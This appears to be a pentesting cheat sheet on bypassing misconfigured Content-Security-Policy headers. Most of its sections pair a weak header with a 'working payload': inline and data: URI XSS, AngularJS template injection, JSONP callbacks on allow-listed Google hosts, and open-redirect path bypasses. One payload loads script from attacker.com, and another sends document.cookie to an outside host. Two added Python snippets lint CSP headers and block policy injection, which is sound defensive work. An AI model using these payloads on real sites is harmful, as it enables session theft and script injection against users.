
CSP

CSP Checker

https://csp-evaluator.withgoogle.com/

Content-Security-Policy Header

Below are various Content-Security-Policy configurations, each with a note on the misconfiguration and a working payload showing how it can be bypassed or abused.

1

If upload from web is allowed or

  • Links:

    • https://medium.com/@shahjerry33/pixel-that-steals-data-im-invisible-3c938d4c3888

    • https://iplogger.org/invisible/

    • https://iplogger.org/15bZ87

2

Content-Security-Policy: script-src https://facebook.com https://google.com 'unsafe-inline' https://*; child-src 'none'; report-uri /Report-parsing-url;

This policy is clearly vulnerable and allows inline scripting: 'unsafe-inline' is listed as a source in script-src, so injected inline scripts execute.

Working payload:

payload.html
"/><script>alert(1337);</script>
3

Content-Security-Policy: script-src https://facebook.com https://google.com 'unsafe-eval' data: http://*; child-src 'none'; report-uri /Report-parsing-url;

Misconfigured: script-src permits 'unsafe-eval' and the data: scheme, so a script can be loaded from a data: URI (the base64 below decodes to alert(document.domain)).

Working payload:

payload.html
<script src="data:;base64,YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=="></script>
4

Content-Security-Policy: script-src 'self' https://facebook.com https://google.com https: data: *; child-src 'none'; report-uri /Report-parsing-url;

Misconfigured: script-src allows the https: scheme, data: and the * wildcard, so scripts can be loaded from any origin or from a data: URI.

Working payloads:

payload1.html
"/>'><script src=https://attacker.com/evil.js></script>
payload2.html
"/>'><script src=data:text/javascript,alert(1337)></script>
5

Content-Security-Policy: script-src 'self'; report-uri /Report-parsing-url;

Misconfigured: object-src and default-src are missing, so <object> embeds are unrestricted.

Working payloads:

payload1.html
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>
payload2.html
">'><object type="application/x-shockwave-flash" data='https://ajax.googleapis.com/ajax/libs/yui/2.8.0r4/build/charts/assets/charts.swf?allowedDomain=\"})))}catch(e) {alert(1337)}//'>
<param name="AllowScriptAccess" value="always"></object>
6

Content-Security-Policy: default-src 'self'; script-src 'self' 'unsafe-eval' ajax.googleapis.com;

With 'unsafe-eval' enabled and ajax.googleapis.com allow-listed, AngularJS can be loaded from that host and a Client-Side Template Injection (CSTI) attack executes arbitrary JavaScript.

Working examples:

example.html
<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.4.6/angular.js"></script>
<div ng-app> {{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}} </div>
<script src=https://drive.google.com/uc?id=...&export=download></script>
7

Content-Security-Policy: default-src 'self'; script-src 'self' *.googleusercontent.com *.google.com *.yandex.net;

You can upload the payload to Yandex.Disk storage (served from an allow-listed *.yandex.net host), copy the download link and replace the content_type parameter value in the link with application/javascript.

Working payload:

payload.html
<script src="https://[***].storage.yandex.net/[...]content_type=application/javascript&[***]"></script>
8

Content-Security-Policy: default-src 'self'

If you are not allowed to connect to any external host (default-src 'self' also governs connect-src), you can still send data in the URL query string by redirecting the user to your web server, since top-level navigation is not restricted by default-src.

Working payload:

payload.js
window.location='https://deteact.com/'+document.cookie;
9

Content-Security-Policy: script-src 'self'; object-src 'none' ; report-uri /Report-parsing-url;

object-src is set to 'none', but this CSP can still be bypassed if the application lets users upload files of any type to the same host: an attacker uploads a file containing JavaScript and loads it with a script tag, which 'self' permits.

Working payload:

payload.html
"/>'><script src="/user_upload/mypic.png.js"></script>
10

Content-Security-Policy: script-src 'self' https://www.google.com; object-src 'none' ; report-uri /Report-parsing-url;

When script-src allows 'self' and an allow-listed domain such as www.google.com, it can be bypassed through a JSONP endpoint on that domain whose callback parameter is attacker-controlled.

Working payload:

payload.html
"><script src="https://www.google.com/complete/search?client=chrome&q=hello&callback=alert#1"></script>
11

Content-Security-Policy: script-src 'self' https://cdnjs.cloudflare.com/; object-src 'none' ; report-uri /Report-parsing-url;

If script-src allows 'self' and a CDN domain, CSP can be bypassed by loading an old, vulnerable version of a library (for example Prototype or AngularJS) hosted on that CDN.

Working payloads:

payload1.html
<script src="https://cdnjs.cloudflare.com/ajax/libs/prototype/1.7.2/prototype.js"></script>
payload2.html
<script src="https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.0.8/angular.js" /></script>
 <div ng-app ng-csp>
  {{ x = $on.curry.call().eval("fetch('http://localhost/index.php').then(d => {})") }}
 </div>
payload3.html
"><script src="https://cdnjs.cloudflare.com/angular.min.js"></script> <div ng-app ng-csp>{{$eval.constructor('alert(1)')()}}</div>
payload4.html
"><script src="https://cdnjs.cloudflare.com/angularjs/1.1.3/angular.min.js"> </script>
<div ng-app ng-csp id=p ng-click=$event.view.alert(1337)>
12

Content-Security-Policy: script-src 'self' ajax.googleapis.com; object-src 'none' ;report-uri /Report-parsing-url;

If scripts are loaded from an allow-listed domain that hosts AngularJS, CSP may be bypassed by loading a vulnerable AngularJS version from it or by using a JSONP callback on the same domain.

Working payloads:

payload1.html
ng-app"ng-csp ng-click=$event.view.alert(1337)><script src=//ajax.googleapis.com/ajax/libs/angularjs/1.0.8/angular.js></script>
payload2.html
"><script src=//ajax.googleapis.com/ajax/services/feed/find?v=1.0%26callback=alert%26context=1337></script>
13

Content-Security-Policy: script-src 'self' accounts.google.com/random/ website.with.redirect.com ; object-src 'none' ; report-uri /Report-parsing-url;

When multiple domains are allow-listed, an open redirect on one of them can be used to reach a JSONP endpoint on another. CSP matches the host of the redirect target but drops the path restriction (here /random/) once a redirect is followed, so the JSONP endpoint becomes reachable and XSS follows.

Working payload:

payload.html
">'><script src="https://website.with.redirect.com/redirect?url=https%3A//accounts.google.com/o/oauth2/revoke?callback=alert(1337)"></script>">
14

Content-Security-Policy: default-src 'self'; script-src 'self' 'unsafe-inline' www.googletagmanager.com;

With inline execution enabled via 'unsafe-inline', script can be injected directly into the page.

Working examples:

payload1.html
url.com/asd.php/?a=<script>alert(document.domain)</script>

Notes:

  • GoogleTagManager examples:

gtm.html
<script>setTimeout(function(){dataLayer.push({event:'gtm.js'})},1000)</script>
<script src="//www.googletagmanager.com/gtm.js?id=GTM-*******"></script>
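As an added example (not code from this page or from the CSP Evaluator linked at the top), the following Python linter parses the header values shown in sections 2 to 14 and reports the weaknesses those sections exploit: the unsafe keywords, data: and wildcard sources, missing fallback directives, path-restricted hosts that lose their path after a redirect, and allow-listed hosts the page shows serving JSONP or old libraries. The RISKY_HOSTS table and the SAMPLE_POLICIES dictionary are constructed from this page; the finding codes are this example's own.

```python
"""CSP linter: an added example, not code from this page or from the CSP Evaluator linked above.
It reports the weaknesses the sections above exploit: 'unsafe-inline'/'unsafe-eval', data: and
wildcard sources, missing fallbacks, paths that stop mattering after a redirect, risky hosts."""
from __future__ import annotations
from urllib.parse import urlsplit

# Hosts this page abuses and why (constructed from the sections above; not an authoritative list).
RISKY_HOSTS = {
    "www.google.com": "JSONP endpoint (/complete/search?callback=)",
    "ajax.googleapis.com": "hosts every AngularJS version plus a JSONP feed API",
    "cdnjs.cloudflare.com": "hosts old Prototype/AngularJS builds usable as gadgets",
    "*.yandex.net": "storage downloads let the uploader pick content_type",
    "www.googletagmanager.com": "gtm.js executes whatever the tag container holds",
}
SCHEME_WILDCARDS = {"*", "http:", "https:", "http://*", "https://*"}
# Directive names: one of these showing up as a *source* means a ';' was forgotten before it.
KNOWN_DIRECTIVES = {"default-src", "script-src", "script-src-elem", "object-src", "child-src", "connect-src",
                    "style-src", "img-src", "frame-src", "base-uri", "form-action", "frame-ancestors",
                    "report-uri", "report-to", "upgrade-insecure-requests"}

def parse_csp(header: str) -> dict[str, list[str]]:
    """Split a header value into {directive: [source, ...]} with directive names lower-cased."""
    policy: dict[str, list[str]] = {}
    for directive in header.split(";"):
        name, *values = directive.split() or [""]
        if name:
            policy.setdefault(name.lower(), []).extend(values)
    return policy

def effective_sources(policy: dict[str, list[str]], directive: str) -> list[str] | None:
    """Sources governing `directive` after falling back to default-src; None means unrestricted."""
    for name in (directive, "default-src"):
        if name in policy:
            return policy[name]
    return None

def host_of(source: str) -> str | None:
    """Host part of a host-source such as https://www.google.com/complete/ (None if there is none)."""
    try:
        return urlsplit(source if "://" in source else "//" + source).hostname
    except ValueError:
        return None

def risky_host_note(host: str) -> str | None:
    """Match a host against RISKY_HOSTS, honouring *.example patterns on either side."""
    for pattern, note in RISKY_HOSTS.items():
        if host == pattern or (pattern.startswith("*.") and host.endswith(pattern[1:])):
            return note
    return None

def lint_csp(header: str) -> list[tuple[str, str]]:
    """Return (code, explanation) findings for one Content-Security-Policy header value."""
    policy = parse_csp(header)
    out: list[tuple[str, str]] = []
    for name, values in policy.items():
        for v in values:
            if v.lower() in KNOWN_DIRECTIVES:
                out.append(("MISSING_SEMICOLON", f"{name}: '{v}' was parsed as a source; a ';' is missing before it"))
    if "default-src" not in policy:
        out.append(("NO_DEFAULT_SRC", "no default-src: every directive not listed is unrestricted"))
    scripts = effective_sources(policy, "script-src")
    # Browsers ignore 'unsafe-inline' when a nonce or hash is also present, so only flag it alone.
    has_nonce_or_hash = any(s.startswith(("'nonce-", "'sha")) for s in scripts or [])
    for v in (s.lower() for s in scripts or []):
        if v == "'unsafe-inline'" and not has_nonce_or_hash:
            out.append(("UNSAFE_INLINE", "script-src 'unsafe-inline': injected inline <script> and event handlers run"))
        elif v == "'unsafe-eval'":
            out.append(("UNSAFE_EVAL", "script-src 'unsafe-eval': eval()/Function() enable client-side template injection"))
        elif v == "data:":
            out.append(("DATA_URI", "script-src data:: <script src=data:...> runs attacker-supplied code"))
        elif v in SCHEME_WILDCARDS:
            out.append(("WILDCARD", f"script-src {v}: any origin matching the wildcard may serve scripts"))
        elif v.startswith("'") or v.endswith(":"):
            continue  # remaining keywords and scheme sources are out of scope here
        else:
            if v.startswith("*."):
                out.append(("WILDCARD_SUBDOMAIN", f"script-src {v}: every subdomain, user-content hosts included, is trusted"))
            host = host_of(v)
            if host and (note := risky_host_note(host)):
                out.append(("RISKY_HOST", f"script-src {v}: {note}"))
            if host and "/" in v.split("://", 1)[-1].rstrip("/"):
                out.append(("PATH_AFTER_REDIRECT", f"script-src {v}: the path is not enforced once a redirect is followed"))
    objects = effective_sources(policy, "object-src")
    if objects is None:
        out.append(("OBJECT_SRC_OPEN", "neither object-src nor default-src: <object data=data:text/html,...> runs script"))
    elif any(o.lower() in {"data:", "*"} for o in objects):
        out.append(("OBJECT_SRC_WEAK", "object-src (or its default-src fallback) allows data: or *: <object> can embed script"))
    return out

# Header values copied from the sections above; the section 5 entry keeps its missing ';' on purpose.
SAMPLE_POLICIES = {
    "section 2": "script-src https://facebook.com https://google.com 'unsafe-inline' https://*; child-src 'none'; report-uri /Report-parsing-url;",
    "section 5": "script-src 'self' report-uri /Report-parsing-url;",
    "section 7": "default-src 'self'; script-src 'self' *.googleusercontent.com *.google.com *.yandex.net;",
    "section 13": "script-src 'self' accounts.google.com/random/ website.with.redirect.com ; object-src 'none' ; report-uri /Report-parsing-url;",
    "strict (constructed)": "default-src 'none'; script-src 'nonce-R4nd0mV4lu3'; object-src 'none'",
}

if __name__ == "__main__":
    for label, header in SAMPLE_POLICIES.items():
        print(label, lint_csp(header) or "no findings")
```

Running it prints the findings per header; the strict constructed policy produces none. The MISSING_SEMICOLON check is worth keeping in any real linter: the section 5 header as originally written turns report-uri into a script source instead of a directive, and browsers accept that silently.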
15

Content-Security-Policy: default-src 'self' data: *; connect-src 'self'; script-src 'self' ;report-uri /_csp; upgrade-insecure-requests

This CSP can be bypassed using iframes if the application allows iframes from an allow-listed domain. Using the srcdoc attribute of an iframe, XSS can be achieved.

Working payloads:

payload1.html
<iframe srcdoc='<script src="data:text/javascript,alert(document.domain)"></script>'></iframe>

Sometimes it can be achieved using the defer and async attributes of a script inside the iframe (this may fail due to SOP in many browsers):

payload2.html
<iframe src='data:text/html,<script defer="true" src="data:text/javascript,document.body.innerText=/hello/"></script>'></iframe>
16

CSP with policy injection (Chrome only)

Example of policy injection via a reflected query parameter:

/?search=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&token=;script-src-elem%20%27unsafe-inline%27
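To see this bug from the defender's side, the added example below (not code from the page) builds the header two ways and resolves which sources actually govern script elements. `token` is the parameter name taken from the URL above; the header layout and the /_csp report endpoint are constructed for illustration.

```python
"""CSP policy injection (section 16), defender's view: an added example, not code from the page.
`token` is the request parameter from the page's URL; header layout and /_csp are constructed."""
import re

# The page's payload, URL-decoded: the ';' ends the current directive and the rest becomes a new one.
INJECTED_TOKEN = ";script-src-elem 'unsafe-inline'"
TOKEN_RE = re.compile(r"^[A-Za-z0-9_-]{1,64}$")  # allow-list a real per-request token must match


def build_csp_vulnerable(token: str) -> str:
    """Bug class: a request parameter is concatenated into the header unchecked."""
    return f"default-src 'self'; script-src 'self'; report-uri /_csp?token={token}"


def build_csp_hardened(token: str) -> str:
    """Same header, but only a token that matches the allow-list may reach it."""
    if not TOKEN_RE.match(token):
        raise ValueError("refusing to emit CSP: token contains characters outside the allow-list")
    return f"default-src 'self'; script-src 'self'; report-uri /_csp?token={token}"


def script_element_sources(header: str) -> list[str]:
    """Sources governing <script> elements: script-src-elem beats script-src, which beats default-src."""
    policy: dict[str, list[str]] = {}
    for directive in header.split(";"):
        parts = directive.split()
        if parts:
            policy[parts[0].lower()] = parts[1:]
    for name in ("script-src-elem", "script-src", "default-src"):
        if name in policy:
            return policy[name]
    return []


if __name__ == "__main__":
    injected = build_csp_vulnerable(INJECTED_TOKEN)
    print(injected)
    print("script elements governed by:", script_element_sources(injected))
    try:
        build_csp_hardened(INJECTED_TOKEN)
    except ValueError as err:
        print("hardened builder:", err)
```

The resolver shows why the injection works in browsers that implement script-src-elem: the appended directive takes precedence over script-src 'self' for script elements, so the reflected `<script>` in the search parameter runs. The hardened builder fails closed; percent-encoding the value before interpolation would be an alternative, but a strict allow-list is easier to audit.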
